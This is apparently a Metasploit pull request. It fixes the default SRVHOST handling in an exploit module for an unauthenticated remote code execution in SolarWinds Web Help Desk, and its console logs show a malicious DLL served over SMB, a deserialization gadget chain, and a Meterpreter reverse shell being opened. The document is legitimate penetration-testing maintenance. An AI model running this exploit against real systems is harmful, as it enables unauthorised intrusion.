### PR TITLE
Add solarwinds srvhost defaults

### DIFF
--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -93,7 +93,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      # XXX: Ticket to improve this option across multiple modules: https://github.com/rapid7/metasploit-framework/issues/20986
+      OptAddressLocal.new('SRVHOST', [false, 'The local host or network interface to listen on. This must be an address on the local machine.', nil])
     ])
   end
 
@@ -152,12 +154,17 @@ class MetasploitModule < Msf::Exploit::Remote
       !handler_enabled? || session_created?
     end
 
-    unless session_ctx[:service].nil?
-      session_ctx[:service].cleanup
-    end
-
     handler
   ensure
+    unless session_ctx[:service].nil?
+      begin
+        session_ctx[:service].cleanup
+      rescue StandardError => e
+        print_error("Error occurred while cleaning up service: #{e.class} #{e}")
+        elog(e)
+      end
+    end
+
     cleanup_service
   end
 
@@ -177,17 +184,22 @@ class MetasploitModule < Msf::Exploit::Remote
     # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.
     return nil unless target['VersionStart'] == '12.8' && session_ctx[:platform] == :windows
 
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+    # XXX: Determine SRVHOST based on global SRVHOST, RHOST or an arbitrary internet address so that it is a bindable, and hopefully routable address
+    #      Original pattern from: https://github.com/rapid7/metasploit-framework/blob/c0f73038f3fb4f76b4ed8a0c661be35639a9d1fc/lib/msf/core/payload.rb#L474-L475
+    #      Related: https://github.com/rapid7/metasploit-framework/issues/20986
+    srvhost = datastore['SRVHOST'] || Rex::Socket.source_address(datastore['RHOST'] || '50.50.50.50')
+
+    if Rex::Socket.is_ip_addr?(srvhost) && Rex::Socket.addr_atoi(srvhost) == 0
       fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
     end
 
     # NOTE: It has to be TCP port 445 for SMB, so we don't expose this port number to the user as an option.
-    print_status("Serving a malicious extension over an SMB share on #{datastore['SRVHOST']} (SMB on TCP port 445)")
+    print_status("Serving a malicious extension over an SMB share on #{srvhost} (SMB on TCP port 445)")
 
     smb_service = SimpleSMBShareWrapper.new
 
     smb_service.datastore['SRVPORT'] = 445
-    smb_service.datastore['SRVHOST'] = datastore['SRVHOST']
+    smb_service.datastore['SRVHOST'] = srvhost
 
     smb_service.setup
 
@@ -197,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     smb_service.start_service({
       'ServerPort' => 445,
-      'ServerHost' => datastore['SRVHOST']
+      'ServerHost' => srvhost
     })
 
     smb_service


### PR DESCRIPTION
Improves the SolarWinds Web Help Desk unauthenticated RCE to provide better defaults for the `SRVHOST` value.

There are two issues with this module:
- The default `SRVHOST` module option of `0.0.0.0` value does not work by default, this breaks automated workflows like in Metasploit Pro
- There's no way to differentiate between the binding IP and the IP embedded into the executed payload

This is a partial fix until https://github.com/rapid7/metasploit-framework/issues/20986 introduces a consistent pattern across existing modules

## Verification

### Before 🔴 

User needs to manually specify srvhost, as the default `0.0.0.0` isn't valid:

```
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > rerun rhost=10.5.132.145 lhost=192.168.3.14
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.123.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
[*] Step 1 - Initial session...
[-] Exploit aborted due to failure: bad-config: The SRVHOST option must be set to a routable IP address.
[*] Exploit completed, but no session was created.
```

### After 🟢 

We now attempt to provide a SRVHOST default for the module to run:

```
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > run rhost=10.5.132.145 lhost=192.168.3.14
[*] Started reverse TCP handler on 192.168.3.14:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
[*] Step 1 - Initial session...
[*] Serving a malicious extension over an SMB share on 192.168.3.14 (SMB on TCP port 445)
[*] Step 2 - Login pref page...
[*] Step 3 - Trigger SAML object...
[*] Step 4 - Create JSON RPC bridge...
[*] Step 5 - Unsafe deserialization...
[*] Malicious SQLite extension UNC: \\192.168.3.14\UxEom\mvzme.dll
[*]   Executing gadget - Registering the org.sqlite.JDBC driver
[*]   Executing gadget - Loading malicious extension over SMB
[*] Sending stage (232006 bytes) to 10.5.132.145
[*] Meterpreter session 1 opened (192.168.3.14:4444 -> 10.5.132.145:52780) at 2026-02-18 19:47:54 -0500

meterpreter >
```